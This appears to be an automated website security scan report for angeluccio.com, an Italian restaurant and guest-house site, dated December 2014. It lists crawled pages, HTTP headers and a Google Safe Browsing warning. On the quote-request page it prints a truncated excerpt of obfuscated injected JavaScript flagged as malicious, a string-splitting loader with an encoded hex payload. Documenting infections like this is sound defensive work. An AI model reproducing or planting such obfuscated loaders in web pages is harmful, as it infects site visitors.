Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=angeluccio.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://angeluccio.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:08 GMT Location: http://www.angeluccio.com/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.angeluccio.com/ | HTTP/1.1 200 OK Date: Thu, 18 Dec 2014 20:11:08 GMT Accept-Ranges: bytes ETag: "32eb243c14bcf1:4bced1" Server: Microsoft-IIS/6.0 Content-Length: 5033 Content-Location: http://www.angeluccio.com/index.html Content-Type: text/html Last-Modified: Sun, 30 Mar 2014 02:39:24 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.angeluccio.com/index.html | 200 OK Content-Length: 5033 Content-Type: text/html | clean |
http://www.angeluccio.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 19436 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetV ...[3896 bytes skipped]... Antivirus reports:
| ||
http://angeluccio.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:10 GMT Location: http://www.angeluccio.com/index.html Server: Apache Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.angeluccio.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://angeluccio.com/ristorante.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:10 GMT Location: http://www.angeluccio.com/ristorante.html Server: Apache Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.angeluccio.com/ristorante.html | 200 OK Content-Length: 7863 Content-Type: text/html | clean |
http://www.angeluccio.com/Scripts/AC_ActiveX.js | 200 OK Content-Length: 11634 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function AC_AX_RunContent(){
var ret = AC_AX_GetArgs(arguments); AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs); } function AC_AX_GetArgs(args){ var ret = new Object(); ret.embedAttrs = new Object(); ret.params = new Object(); ret.objAttrs = new Object(); for (var i=0; i < args.length; i=i+2){ var currArg = args[i].toLowerCase(); switch (currArg) ...[3845 bytes skipped]... Antivirus reports:
| ||
http://angeluccio.com/villa_gianna.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:11 GMT Location: http://www.angeluccio.com/villa_gianna.html Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.angeluccio.com/villa_gianna.html | 200 OK Content-Length: 5436 Content-Type: text/html | clean |
http://www.angeluccio.com/bar.html | 200 OK Content-Length: 6091 Content-Type: text/html | clean |
http://www.angeluccio.com/contatti.html | 200 OK Content-Length: 4811 Content-Type: text/html | clean |
http://angeluccio.com/contatti.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:12 GMT Location: http://www.angeluccio.com/contatti.html Server: Apache Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://angeluccio.com/le_camere.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:12 GMT Location: http://www.angeluccio.com/le_camere.html Server: Apache Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.angeluccio.com/le_camere.html | 200 OK Content-Length: 10227 Content-Type: text/html | clean |
http://www.angeluccio.com/suite.html | 200 OK Content-Length: 7342 Content-Type: text/html | clean |
http://www.angeluccio.com/richiesta_preventivo.html | 200 OK Content-Length: 15683 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61 </ul> </div> <hr /> <div id="page"> <div id="splash" class="twocols"> <script type="text/javascript"> AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0','width','720','height','180','src','images/banner','quality','high','pluginspage','http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash','movie','images/banner' ); Antivirus reports:
| ||
http://angeluccio.com/richiesta_preventivo.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:13 GMT Location: http://www.angeluccio.com/richiesta_preventivo.html Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://angeluccio.com/bar.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:13 GMT Location: http://www.angeluccio.com/bar.html Server: Apache Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 | clean |
http://angeluccio.com/suite.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:13 GMT Location: http://www.angeluccio.com/suite.html Server: Apache Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://angeluccio.com/cucina.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 20:11:13 GMT Location: http://www.angeluccio.com/cucina.html Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.angeluccio.com/cucina.html | 200 OK Content-Length: 7695 Content-Type: text/html | clean |
http://www.angeluccio.com/lavoro.html | 200 OK Content-Length: 7177 Content-Type: text/html | clean |
http://www.angeluccio.com/per_la_sera.html | 200 OK Content-Length: 6291 Content-Type: text/html | clean |
http://www.angeluccio.com/cerimonie.html | 200 OK Content-Length: 7651 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: angeluccio.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 20:11:08 GMT
Location: http://www.angeluccio.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
GET / HTTP/1.1
Host: angeluccio.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 20:11:08 GMT
Location: http://www.angeluccio.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: angeluccio.com
Referer: http://www.google.com/search?q=angeluccio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: angeluccio.com
Referer: http://www.google.com/search?q=angeluccio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.